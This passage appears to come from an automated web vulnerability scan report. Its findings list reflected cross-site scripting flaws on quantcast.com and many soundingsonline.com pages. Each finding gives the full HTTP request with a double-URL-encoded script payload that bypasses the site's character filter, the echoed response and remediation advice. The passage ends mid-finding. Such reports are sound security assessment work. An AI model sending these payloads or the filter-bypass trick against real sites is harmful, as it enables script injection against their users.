GET /p-352ZWwG8I7OVQ90702"><a>8af2ecf874f HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sat, 29 Jan 2011 04:37:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94ea2<a>2d83a5faf87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /p-352ZWwG8I7OVQ94ea2<a>2d83a5faf87 HTTP/1.1 Host: www.quantcast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html Content-Language: en Date: Sat, 29 Jan 2011 04:37:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; cha ...[SNIP]... <em> p-352ZWwG8I7OVQ94ea2<a>2d83a5faf87</em> ...[SNIP]...
4.866. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/about-us
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b93c6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2530141dfcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b93c6"><script>alert(1)</script>2530141dfcb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /about-us?b93c6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2530141dfcb=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:20:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.867. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/advertise
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37b12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1404705397 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37b12"><script>alert(1)</script>f1404705397 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /advertise?37b12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1404705397=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:18:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.868. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8086b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ea98ea0c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8086b"><script>alert(1)</script>2ea98ea0c61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /boat-shop?8086b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ea98ea0c61=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:53 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.869. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/know-how
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36fa0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b650f6629c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 36fa0"><script>alert(1)</script>2b650f6629c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /boat-shop/know-how?36fa0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2b650f6629c=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.870. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/new-boats
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3aa39f41117 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 55f54"><script>alert(1)</script>3aa39f41117 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /boat-shop/new-boats?55f54%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3aa39f41117=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:17 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.871. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/new-gear
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45204%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0b510e9b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45204"><script>alert(1)</script>a0b510e9b6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /boat-shop/new-gear?45204%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea0b510e9b6=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.872. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/on-powerboats
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1935b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e64e63626ef9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1935b"><script>alert(1)</script>64e63626ef9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /boat-shop/on-powerboats?1935b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e64e63626ef9=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.873. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/on-sailboats
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c395%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9f14107a73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9c395"><script>alert(1)</script>c9f14107a73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /boat-shop/on-sailboats?9c395%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec9f14107a73=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.874. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/q-a-a
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebfc7457ca33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5a4df"><script>alert(1)</script>bfc7457ca33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /boat-shop/q-a-a?5a4df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebfc7457ca33=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:16 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:16 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.875. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/sea-savvy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76c48%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04a044d541e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 76c48"><script>alert(1)</script>04a044d541e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /boat-shop/sea-savvy?76c48%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e04a044d541e=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:22 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.876. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/tech-talk
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fde49%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1781c9806e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fde49"><script>alert(1)</script>f1781c9806e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /boat-shop/tech-talk?fde49%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1781c9806e=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:23 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.877. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/boat-shop/used-boat-review
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7387%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf6ee365ffe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e7387"><script>alert(1)</script>af6ee365ffe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /boat-shop/used-boat-review?e7387%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaf6ee365ffe=1 HTTP/1.1 Host: www.soundingsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 28 Jan 2011 17:19:28 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Fri, 28 Jan 2011 17:19:27 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
4.878. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.soundingsonline.com
Path:
/calendar
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d96a3%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebaf5dd54016 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d96a3"><script>alert(1)</script>baf5dd54016 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
